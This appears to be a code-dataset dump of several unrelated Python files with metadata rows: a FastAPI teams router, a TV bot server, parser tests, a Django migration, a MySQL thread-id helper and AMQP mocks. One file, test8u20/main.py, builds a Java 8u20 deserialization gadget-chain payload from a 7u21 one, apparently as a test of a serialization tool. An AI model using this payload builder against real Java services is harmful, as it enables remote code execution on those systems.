| 30.08 | 93 | 0.542553 | 88 | 752 | 4.613636 | 0.397727 | 0.044335 | 0.083744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003906 | 0.319149 | 752 | 24 | 94 | 31.333333 | 0.789063 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17d69728ccc0d7694c2df558651b0fdf5636b10f | 2,048 | py | Python | splash/teams/teams_routes.py | dylanmcreynolds/splash-server | 28559d5109c8efcf3ea882b91a99722d957f2daa | [
"BSD-3-Clause-LBNL"
] | null | null | null | splash/teams/teams_routes.py | dylanmcreynolds/splash-server | 28559d5109c8efcf3ea882b91a99722d957f2daa | [
"BSD-3-Clause-LBNL"
] | null | null | null | splash/teams/teams_routes.py | dylanmcreynolds/splash-server | 28559d5109c8efcf3ea882b91a99722d957f2daa | [
"BSD-3-Clause-LBNL"
] | null | null | null | from typing import List, Optional
from attr import dataclass
from fastapi import APIRouter, Security
from fastapi.exceptions import HTTPException
from fastapi import Header
from pydantic import BaseModel
from pydantic.tools import parse_obj_as
from splash.api.auth import get_current_user
from splash.service import SplashMetadata
from splash.service.base import ObjectNotFoundError
from ..users import User
from . import NewTeam, Team
from .teams_service import TeamsService
teams_router = APIRouter()
@dataclass
class Services():
teams: TeamsService
services = Services(None)
def set_teams_service(svc: TeamsService):
services.teams = svc
class CreateTeamResponse(BaseModel):
uid: str
splash_md: SplashMetadata
@teams_router.get("", tags=["teams"], response_model=List[Team])
def read_teams(
page: int = 1,
page_size: int = 100,
current_user: User = Security(get_current_user)):
results = services.teams.retrieve_multiple(current_user, page=page, page_size=page_size)
return parse_obj_as(List[Team], list(results))
@teams_router.get("/{uid}", tags=['teams'], response_model=Team)
def read_team(
uid: str,
current_user: User = Security(get_current_user)):
team = services.teams.retrieve_one(current_user, uid)
return team
@teams_router.post("", tags=['teams'], response_model=CreateTeamResponse)
def create_team(
team: NewTeam,
current_user: User = Security(get_current_user)):
response = services.teams.create(current_user, team)
return response
@teams_router.put("/{uid}", tags=['teams'], response_model=CreateTeamResponse)
def update_team(uid: str,
                team: NewTeam,
                current_user: User = Security(get_current_user),
                if_match: Optional[str] = Header(None)):
try:
response = services.teams.update(current_user, team, uid, etag=if_match)
except ObjectNotFoundError:
raise HTTPException(404)
return response
| 28.054795 | 92 | 0.70752 | 249 | 2,048 | 5.634538 | 0.281125 | 0.101924 | 0.049893 | 0.065574 | 0.132573 | 0.132573 | 0.132573 | 0.079829 | 0.079829 | 0.079829 | 0 | 0.004271 | 0.199707 | 2,048 | 72 | 93 | 28.444444 | 0.851739 | 0 | 0 | 0.132075 | 0 | 0 | 0.015625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09434 | false | 0 | 0.245283 | 0 | 0.509434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
17da768787ed79973072983b3cce0e340bf8fc26 | 1,304 | py | Python | PythonSelenium/src/server.py | talhaHavadar/MomTV | 1673b8d41a3d6157b7e1ba5ba4bd3ad7a70a3ba9 | [
"MIT"
] | 1 | 2019-02-23T06:41:58.000Z | 2019-02-23T06:41:58.000Z | PythonSelenium/src/server.py | talhaHavadar/MomTV | 1673b8d41a3d6157b7e1ba5ba4bd3ad7a70a3ba9 | [
"MIT"
] | null | null | null | PythonSelenium/src/server.py | talhaHavadar/MomTV | 1673b8d41a3d6157b7e1ba5ba4bd3ad7a70a3ba9 | [
"MIT"
] | null | null | null | """
Handles all requests that coming from phone
"""
import socketserver
import bot
from bot import TVBot
class TCPSocketHandler(socketserver.StreamRequestHandler):
"""
Handles the tcp socket connection
"""
def handle(self):
self.bot = TVBot()
while True:
self.data = self.rfile.readline()
if not self.data:
break
self.data = self.data.decode()
if "STAR" in self.data.upper():
self.bot.open(bot.TV_STAR)
elif "ATV" in self.data.upper():
self.bot.open(bot.TV_ATV)
elif "KANAL D" in self.data.upper() or "KANALD" in self.data.upper():
self.bot.open(bot.TV_KANALD)
elif "TRT" in self.data.upper():
self.bot.open(bot.TV_TRT)
elif "FOX" in self.data.upper():
self.bot.open(bot.TV_FOX)
elif "SHOW TV" in self.data.upper() or "SHOW" in self.data.upper():
self.bot.open(bot.TV_SHOW)
elif "TV2" in self.data.upper() or "TV 2" in self.data.upper():
self.bot.open(bot.TV_TV2)
elif "KAPAT" in self.data.upper() or "CLOSE" in self.data.upper():
self.bot.close()
self.bot.close()
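A hedged refactor sketch, not part of the original bot: the long if/elif keyword dispatch in handle() can be expressed as a lookup table. The TV_* strings below are hypothetical stand-ins for the bot module's channel constants.

```python
# Sketch only: a table-driven variant of the channel dispatch in handle().
# Entries are checked in order, mirroring the original elif chain.
CHANNEL_KEYWORDS = [
    (("STAR",), "TV_STAR"),
    (("ATV",), "TV_ATV"),
    (("KANAL D", "KANALD"), "TV_KANALD"),
    (("TRT",), "TV_TRT"),
    (("FOX",), "TV_FOX"),
    (("SHOW TV", "SHOW"), "TV_SHOW"),
    (("TV2", "TV 2"), "TV_TV2"),
]

def match_channel(text):
    """Return the first channel whose keyword appears in the message."""
    upper = text.upper()
    for keywords, channel in CHANNEL_KEYWORDS:
        if any(keyword in upper for keyword in keywords):
            return channel
    return None
```

With this table, `handle()` would reduce to one lookup plus a call to `self.bot.open(...)`, and adding a new station means adding one tuple rather than another elif branch.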
| 34.315789 | 81 | 0.537577 | 170 | 1,304 | 4.082353 | 0.282353 | 0.184438 | 0.172911 | 0.259366 | 0.442363 | 0.34438 | 0.31268 | 0.31268 | 0.31268 | 0 | 0 | 0.00348 | 0.338957 | 1,304 | 37 | 82 | 35.243243 | 0.801624 | 0.059049 | 0 | 0.071429 | 0 | 0 | 0.045188 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.107143 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17de742785e7e376b1d10db620dbbd2f43d27408 | 15,752 | py | Python | h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 6,098 | 2015-05-22T02:46:12.000Z | 2022-03-31T16:54:51.000Z | h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 2,517 | 2015-05-23T02:10:54.000Z | 2022-03-30T17:03:39.000Z | h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 2,199 | 2015-05-22T04:09:55.000Z | 2022-03-28T22:20:45.000Z | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Test case for pyparser."""
from __future__ import division, print_function
import os
import re
import textwrap
import tokenize
from future.builtins import open
import pyparser
def _make_tuple(op):
return lambda x: (op, x)
NL = tokenize.NL
NEWLINE = tokenize.NEWLINE
NAME = _make_tuple(tokenize.NAME)
OP = _make_tuple(tokenize.OP)
INDENT = tokenize.INDENT
DEDENT = tokenize.DEDENT
COMMENT = tokenize.COMMENT
STRING = tokenize.STRING
NUMBER = tokenize.NUMBER
END = tokenize.ENDMARKER
token_names = {NL: "NL", NEWLINE: "NEWLINE", INDENT: "INDENT", COMMENT: "COMMENT", DEDENT: "DEDENT",
STRING: "STRING", NUMBER: "NUMBER", END: "END", tokenize.OP: "OP", tokenize.NAME: "NAME"}
Ws = pyparser.Whitespace
Comment = pyparser.Comment
Comment_banner = (pyparser.Comment, "banner")
Comment_code = (pyparser.Comment, "code")
Docstring = pyparser.Docstring
Import_future = (pyparser.ImportBlock, "future")
Import_stdlib = (pyparser.ImportBlock, "stdlib")
Import_3rdpty = (pyparser.ImportBlock, "third-party")
Import_1stpty = (pyparser.ImportBlock, "first-party")
Expression = pyparser.Expression
Function = (pyparser.Callable, "def")
Class = (pyparser.Callable, "class")
def assert_same_code(code1, code2):
"""Verify whether 2 code fragments are identical, and if not print an error message."""
regex = re.compile(r"\s+\\$", re.M)
code1 = re.sub(regex, r"\\", code1)
code2 = re.sub(regex, r"\\", code2)
if code2 != code1:
print()
lines_code1 = code1.splitlines()
lines_code2 = code2.splitlines()
n_diffs = 0
for i in range(len(lines_code1)):
old_line = lines_code1[i]
new_line = lines_code2[i] if i < len(lines_code2) else ""
if old_line != new_line:
print("%3d - %s" % (i + 1, old_line))
print("%3d + %s" % (i + 1, new_line))
n_diffs += 1
if n_diffs == 5: break
raise AssertionError("Unparsed code1 does not match the original.")
def test_tokenization():
"""
Test function for ``pyparser._normalize_tokens()``.
Even though this function is private, it is extremely important to verify that it behaves correctly. In
particular, we want to check that it does not break the round-trip guarantee of the tokenizer, and that it
fixes all the problems that the original tokenizer has.
"""
# Helper functions
def _parse_to_tokens(text):
"""Parse text into tokens and then normalize them."""
gen = iter(text.splitlines(True)) # True = keep newlines
readline = gen.next if hasattr(gen, "next") else gen.__next__
return pyparser._tokenize(readline)
def _unparse_tokens(tokens):
"""Convert tokens back into the source code."""
return tokenize.untokenize(t.token for t in tokens)
def _assert_tokens(tokens, target):
"""Check that the tokens list corresponds to the target provided."""
for i in range(len(tokens)):
assert i < len(target), "Token %d %r not expected" % (i, tokens[i])
tok = tokens[i]
trg = target[i]
valid = False
if isinstance(trg, int):
if tok.op == trg: valid = True
name = token_names[trg]
elif isinstance(trg, tuple) and len(trg) == 2:
if tok.op == trg[0] and tok.str == trg[1]: valid = True
name = "%s(%s)" % (token_names[trg[0]], trg[1])
else:
assert False, "Unknown target: %r" % trg
if not valid:
assert False, "Mismatched token %d: found %r, should be %r" % (i, tok, name)
assert len(target) == len(tokens), "Expected too many tokens: %d vs %d" % (len(tokens), len(target))
def check_code(code, expected_tokens=None, filename=None):
"""Test parsing of the given piece of code."""
code = textwrap.dedent(code)
if filename:
print("Testing tokenization of %s:" % filename, end=" ")
else:
check_code.index = getattr(check_code, "index", 0) + 1
print("Testing tokenization %d:" % check_code.index, end=" ")
tokens = _parse_to_tokens(code)
try:
try:
unparsed = _unparse_tokens(tokens)
except ValueError as e:
raise AssertionError("Cannot unparse tokens: %s" % e)
assert_same_code(code, unparsed)
if expected_tokens:
_assert_tokens(tokens, expected_tokens)
print("ok")
except AssertionError as e:
print(u"Error: %s" % e)
print(u"Original code fragment:\n" + code)
print("Tokens:")
for i, tok in enumerate(tokens):
print("%3d %r" % (i, tok))
raise
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, COMMENT, NL, DEDENT, DEDENT, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, DEDENT, COMMENT, NL, DEDENT, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, DEDENT, DEDENT, COMMENT, NL, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
def func():
# function
pass
""", [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def func(): # function
# hanging comment
pass
""", [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), COMMENT, NEWLINE, INDENT, COMMENT, NL,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def foo():
pass
#comment
def bar():
pass
""", [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
DEDENT, NL, COMMENT, NL, NAME("def"), NAME("bar"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def hello():
print("hello")
""", [NL, NAME("def"), NAME("hello"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NL, NL,
NAME("print"), OP("("), STRING, OP(")"), NEWLINE, DEDENT, END])
check_code("""
class Foo:
def foo(self):
pass
def bar(self):
return
""", [NL, NAME("class"), NAME("Foo"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("foo"), OP("("),
NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, NL, NAME("def"),
NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("return"), NEWLINE, DEDENT,
DEDENT, END])
check_code("""
def foo():
# Attempt to create the output directory
try:
os.makedirs(destdir)
except OSError as e:
raise
""", [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("try"),
OP(":"), NEWLINE, INDENT, NAME("os"), OP("."), NAME("makedirs"), OP("("), NAME("destdir"), OP(")"),
NEWLINE, DEDENT, NAME("except"), NAME("OSError"), NAME("as"), NAME("e"), OP(":"), NEWLINE, INDENT,
NAME("raise"), NEWLINE, DEDENT, DEDENT, END])
check_code("""
if PY2:
def unicode():
raise RuntimeError # disable this builtin function
# because it doesn't exist in Py3
handler = lambda: None # noop
# (will redefine later)
################################################################################
# comment 1
print("I'm done.")
""", [NL, NAME("if"), NAME("PY2"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("unicode"), OP("("), OP(")"),
OP(":"), NEWLINE, INDENT, NAME("raise"), NAME("RuntimeError"), COMMENT, NEWLINE, COMMENT, NL,
DEDENT, DEDENT, NL, NAME("handler"), OP("="), NAME("lambda"), OP(":"), NAME("None"), COMMENT, NEWLINE,
COMMENT, NL, NL, COMMENT, NL, NL, COMMENT, NL, NAME("print"), OP("("), STRING, OP(")"), NEWLINE, END])
check_code("""
def test3():
x = 1
# bad
print(x)
""", [NL, NAME("def"), NAME("test3"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("x"), OP("="),
NUMBER, NEWLINE, COMMENT, NL, NAME("print"), OP("("), NAME("x"), OP(")"), NEWLINE, DEDENT, END])
check_code("""
class Foo(object):
#-------------
def bar(self):
if True:
pass
# Originally the DEDENTs are all the way down near the decorator. Here we're testing how they'd travel
# all the way up across multiple comments.
# comment 3
# commmmmmmment 4
@decorator
""", [NL, NAME("class"), NAME("Foo"), OP("("), NAME("object"), OP(")"), OP(":"), NEWLINE, INDENT,
COMMENT, NL, NAME("def"), NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT,
NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
DEDENT, DEDENT, DEDENT, NL, COMMENT, NL, COMMENT, NL, NL, COMMENT, NL, NL, COMMENT,
NL, OP("@"), NAME("decorator"), NEWLINE, END])
    # Really, one should avoid code like this... It won't break the normalizer, but it may
    # create problems downstream.
check_code("""
if True:
if False:
# INDENT will be inserted before this comment
raise
# DEDENT will be after this comment
else:
praise()
""", [NL, NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("if"), NAME("False"), OP(":"), NEWLINE,
INDENT, COMMENT, NL, NAME("raise"), NEWLINE, COMMENT, NL, DEDENT, NAME("else"), OP(":"), NEWLINE,
INDENT, NAME("praise"), OP("("), OP(")"), NEWLINE, DEDENT, DEDENT, END])
for directory in [".", "../../h2o-py/h2o", "../../h2o-py/tests"]:
absdir = os.path.abspath(directory)
for dir_name, subdirs, files in os.walk(absdir):
for f in files:
if f.endswith(".py"):
filename = os.path.join(dir_name, f)
with open(filename, "rt", encoding="utf-8") as fff:
check_code(fff.read(), filename=filename)
def test_pyparser():
"""Test case: general parsing."""
def _check_blocks(actual, expected):
assert actual, "No parse results"
for i in range(len(actual)):
assert i < len(expected), "Unexpected block %d:\n%r" % (i, actual[i])
valid = False
if isinstance(expected[i], type):
if isinstance(actual[i], expected[i]): valid = True
elif isinstance(expected[i], tuple):
if isinstance(actual[i], expected[i][0]) and actual[i].type == expected[i][1]: valid = True
if not valid:
assert False, "Invalid block: expected %r, got %r" % (expected[i], actual[i])
def check_code(code, blocks=None, filename=None):
code = textwrap.dedent(code)
if not code.endswith("\n"): code += "\n"
if filename:
print("Testing file %s..." % filename, end=" ")
else:
check_code.index = getattr(check_code, "index", 0) + 1
print("Testing code fragment %d..." % check_code.index, end=" ")
preparsed = None
parsed = None
unparsed = None
try:
preparsed = pyparser.parse_text(code)
parsed = preparsed.parse(2)
try:
unparsed = parsed.unparse()
except ValueError as e:
for i, tok in enumerate(parsed.tokens):
print("%3d %r" % (i, tok))
raise AssertionError("Cannot unparse code: %s" % e)
assert_same_code(code, unparsed)
if blocks:
_check_blocks(parsed.parsed, blocks)
print("ok")
except AssertionError as e:
print()
print(u"Error: " + str(e))
print(u"Original code fragment:\n" + code)
if unparsed: print(u"Unparsed code:\n" + unparsed)
if parsed:
print(parsed)
for i, tok in enumerate(parsed.tokens):
print("%3d %r" % (i, tok))
raise
except Exception as e:
print()
print(u"Error: " + str(e))
if preparsed:
print("Preparsed tokens:")
for i, tok in enumerate(preparsed.tokens):
print("%4d %r" % (i, tok))
else:
print("Initial parsing has failed...")
raise
check_code("""
# -*- encoding: utf-8 -*-
# copyright: 2016 h2o.ai
\"\"\"
A code example.
It's not supposed to be functional, or even functionable.
\"\"\"
from __future__ import braces, antigravity
# Standard library imports
import sys
import time
import this
import h2o
from h2o import H2OFrame, init
from . import *
# Do some initalization for legacy python versions
if PY2:
def unicode():
raise RuntimeError # disable this builtin function
# because it doesn't exist in Py3
handler = lambda: None # noop
# (will redefine later)
################################################################################
# comment 1
class Foo(object):
#------ Public -------------------------------------------------------------
def bar(self):
pass
# def foo():
# print(1)
#
# print(2)
# comment 2
@decorated(
1, 2, (3))
@dddd
def bar():
# be
# happy
print("bar!")
# bye""", [Ws, Comment, Docstring, Import_future, Ws, Import_stdlib, Ws, Import_1stpty, Ws, Expression,
Ws, Expression, Ws, Comment_banner, Ws, Class, Ws, Comment_code, Ws, Function, Comment, Ws])
for directory in [".", "../../h2o-py", "../../py"]:
absdir = os.path.abspath(directory)
for dir_name, subdirs, files in os.walk(absdir):
for f in files:
if f.endswith(".py"):
filename = os.path.join(dir_name, f)
with open(filename, "rt", encoding="utf-8") as fff:
check_code(fff.read(), filename=filename)
# test_tokenization()
test_pyparser()
| 38.702703 | 117 | 0.509777 | 1,753 | 15,752 | 4.517399 | 0.180833 | 0.034095 | 0.047354 | 0.047986 | 0.398661 | 0.350044 | 0.29928 | 0.274151 | 0.226923 | 0.202425 | 0 | 0.00731 | 0.322562 | 15,752 | 406 | 118 | 38.79803 | 0.734795 | 0.054977 | 0 | 0.39528 | 0 | 0.00295 | 0.308362 | 0.014915 | 0 | 0 | 0 | 0 | 0.050147 | 1 | 0.029499 | false | 0.073746 | 0.058997 | 0.00295 | 0.100295 | 0.103245 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
17e137bb0de594618d6979cb258b74fc8c2fc07c | 353 | py | Python | Django-React/exemple/api/migrations/0002_rename_created_app_room_created_at.py | S-c-r-a-t-c-h-y/coding-projects | cad33aedb72720c3e3a37c7529e55abd3edb291a | [
"MIT"
] | null | null | null | Django-React/exemple/api/migrations/0002_rename_created_app_room_created_at.py | S-c-r-a-t-c-h-y/coding-projects | cad33aedb72720c3e3a37c7529e55abd3edb291a | [
"MIT"
] | null | null | null | Django-React/exemple/api/migrations/0002_rename_created_app_room_created_at.py | S-c-r-a-t-c-h-y/coding-projects | cad33aedb72720c3e3a37c7529e55abd3edb291a | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-07-03 21:26
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='room',
old_name='created_app',
new_name='created_at',
),
]
| 18.578947 | 45 | 0.575071 | 38 | 353 | 5.184211 | 0.815789 | 0.111675 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 0.311615 | 353 | 18 | 46 | 19.611111 | 0.736626 | 0.121813 | 0 | 0 | 1 | 0 | 0.12987 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17e2be1570ac1669d8bc94548067cec13cd745f2 | 2,049 | py | Python | tests/test8u20/main.py | potats0/javaSerializationTools | eb0291bdd336e28ca5dd9ee86ba6d645f1bf6e8f | [
"Apache-2.0"
] | 124 | 2021-01-21T08:49:20.000Z | 2022-01-23T07:17:30.000Z | tests/test8u20/main.py | potats0/javaSerializationDump | eb0291bdd336e28ca5dd9ee86ba6d645f1bf6e8f | [
"Apache-2.0"
] | 3 | 2021-01-22T03:29:55.000Z | 2021-04-20T06:04:50.000Z | tests/test8u20/main.py | potats0/javaSerializationTools | eb0291bdd336e28ca5dd9ee86ba6d645f1bf6e8f | [
"Apache-2.0"
] | 12 | 2021-01-21T14:09:01.000Z | 2021-11-18T20:13:43.000Z | import yaml
from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock
from javaSerializationTools import ObjectRead
from javaSerializationTools import ObjectWrite
if __name__ == '__main__':
with open("../files/7u21.ser", "rb") as f:
a = ObjectRead(f)
obj = a.readContent()
    # Step 1: add a fake field named "fake" to the HashSet
signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;")
fakeSignature = {'name': 'fake', 'signature': signature}
obj.javaClass.superJavaClass.fields.append(fakeSignature)
    # Build a fake BeanContextSupport deserialization object; note it must reference the
    # AnnotationInvocationHandler that comes later.
    # Read the class description of BeanContextSupportClass
with open('BeanContextSupportClass.yaml', 'r') as f1:
BeanContextSupportClassDesc = yaml.load(f1.read(), Loader=yaml.FullLoader)
    # Add the beanContextChildPeer attribute to beanContextSupportObject
beanContextSupportObject = JavaObject(BeanContextSupportClassDesc)
beanContextChildPeerField = JavaField('beanContextChildPeer',
JavaString('Ljava/beans/beancontext/BeanContextChild'),
beanContextSupportObject)
beanContextSupportObject.fields.append([beanContextChildPeerField])
    # Add the serializable attribute to beanContextSupportObject
serializableField = JavaField('serializable', 'I', 1)
beanContextSupportObject.fields.append([serializableField])
    # Add objectAnnotations data to beanContextSupportObject
beanContextSupportObject.objectAnnotation.append(JavaEndBlock())
AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value
beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler)
    # Put the beanContextSupportObject into the fake field
fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject)
obj.fields[0].append(fakeField)
with open("8u20.ser", 'wb') as f:
o = ObjectWrite(f)
o.writeContent(obj)
| 43.595745 | 101 | 0.70815 | 142 | 2,049 | 10.161972 | 0.507042 | 0.054054 | 0.066528 | 0.042966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008 | 0.20693 | 2,049 | 46 | 102 | 44.543478 | 0.88 | 0.146901 | 0 | 0 | 0 | 0 | 0.121909 | 0.06383 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17e369dc9f4c67838ee2db6b83ebfbd5715f6650 | 634 | py | Python | getmysql_threadid.py | wang1352083/mysql_tool | 52f7efc319d2732d780913e7b1d7692fab8e791a | [
"MIT"
] | null | null | null | getmysql_threadid.py | wang1352083/mysql_tool | 52f7efc319d2732d780913e7b1d7692fab8e791a | [
"MIT"
] | null | null | null | getmysql_threadid.py | wang1352083/mysql_tool | 52f7efc319d2732d780913e7b1d7692fab8e791a | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys
base31 = pow(2, 31)
base32 = pow(2, 32)
base = 0xFFFFFFFF
'''
The thread id shown in MySQL's processlist does not match the thread id recorded in
mysql.log, so convert: processlist.threadid -> mysql.log.threadid
'''
def long_to_short(pid):
    if pid < base31:
        return pid
    elif base31 <= pid < base32:
        return pid - base32
    else:
        return pid & base
def usage(filename):
    print("please use " + filename + " process_thread")
    print("\teg: " + filename + " 12345")
sys.exit(0)
if __name__ == "__main__":
if len(sys.argv) == 2:
        pid = int(sys.argv[1])
        print(long_to_short(pid))
else:
usage(sys.argv[0])
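A minimal sketch of the wraparound arithmetic above, with the constants spelled out; the function name here is hypothetical and the assertions simply illustrate the three branches, they are not part of the original tool.

```python
# Thread ids below 2**31 pass through unchanged; ids in [2**31, 2**32)
# come out as negative signed-32-bit values; anything larger keeps only
# its low 32 bits.
BASE31 = 2 ** 31
BASE32 = 2 ** 32
MASK = 0xFFFFFFFF

def to_log_thread_id(pid):
    if pid < BASE31:
        return pid
    elif pid < BASE32:
        return pid - BASE32
    return pid & MASK

assert to_log_thread_id(12345) == 12345           # small id: unchanged
assert to_log_thread_id(BASE31) == -BASE31        # 2**31 - 2**32 == -2**31
assert to_log_thread_id(BASE32 + 7) == 7          # masked to low 32 bits
```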
| 22.642857 | 52 | 0.635647 | 87 | 634 | 4.482759 | 0.563218 | 0.069231 | 0.05641 | 0.071795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057377 | 0.230284 | 634 | 27 | 53 | 23.481481 | 0.741803 | 0.031546 | 0 | 0.095238 | 0 | 0 | 0.089286 | 0 | 0 | 0 | 0.019841 | 0 | 0 | 0 | null | null | 0 | 0.047619 | null | null | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17e98bdd9410e5ff20a99bb45742f5cb653135df | 4,267 | py | Python | guillotina_amqp/tests/mocks.py | vjove/guillotina_amqp | 34f2011ea5547166211e90608c54657d93dde4fc | [
"BSD-3-Clause"
] | 4 | 2018-06-14T12:03:41.000Z | 2020-02-12T17:07:18.000Z | guillotina_amqp/tests/mocks.py | vjove/guillotina_amqp | 34f2011ea5547166211e90608c54657d93dde4fc | [
"BSD-3-Clause"
] | 45 | 2018-11-12T10:57:30.000Z | 2021-05-26T19:13:12.000Z | guillotina_amqp/tests/mocks.py | vjove/guillotina_amqp | 34f2011ea5547166211e90608c54657d93dde4fc | [
"BSD-3-Clause"
] | 4 | 2018-12-19T16:59:04.000Z | 2021-06-20T16:27:43.000Z | import asyncio
import uuid
class MockChannel:
def __init__(self):
self.published = []
self.acked = []
self.nacked = []
async def publish(self, *args, **kwargs):
self.published.append({"args": args, "kwargs": kwargs})
async def basic_client_ack(self, *args, **kwargs):
self.acked.append({"args": args, "kwargs": kwargs})
async def basic_client_nack(self, *args, **kwargs):
self.nacked.append({"args": args, "kwargs": kwargs})
class MockEnvelope:
def __init__(self, uid):
self.delivery_tag = uid
class MockAMQPChannel:
def __init__(self, protocol):
self.protocol = protocol
self.consumers = []
self.closed = False
self.unacked_messages = []
async def basic_qos(self, *args, **kwargs):
pass
async def exchange_declare(self, *args, **kwargs):
pass
async def queue_declare(self, queue_name, *args, **kwargs):
if queue_name not in self.protocol.queues:
self.protocol.queues[queue_name] = []
if "arguments" in kwargs:
arguments = kwargs["arguments"]
if "x-dead-letter-routing-key" in arguments:
self.protocol.dead_mapping[queue_name] = arguments[
"x-dead-letter-routing-key"
]
async def queue_bind(self, *args, **kwargs):
pass
async def _basic_consume(self, handler, queue_name):
while not self.closed:
await asyncio.sleep(0.02)
if queue_name not in self.protocol.queues:
continue
else:
messages = self.protocol.queues[queue_name]
self.protocol.queues[queue_name] = []
self.unacked_messages.extend(messages)
for message in messages:
await handler(
self,
message["message"],
MockEnvelope(message["id"]),
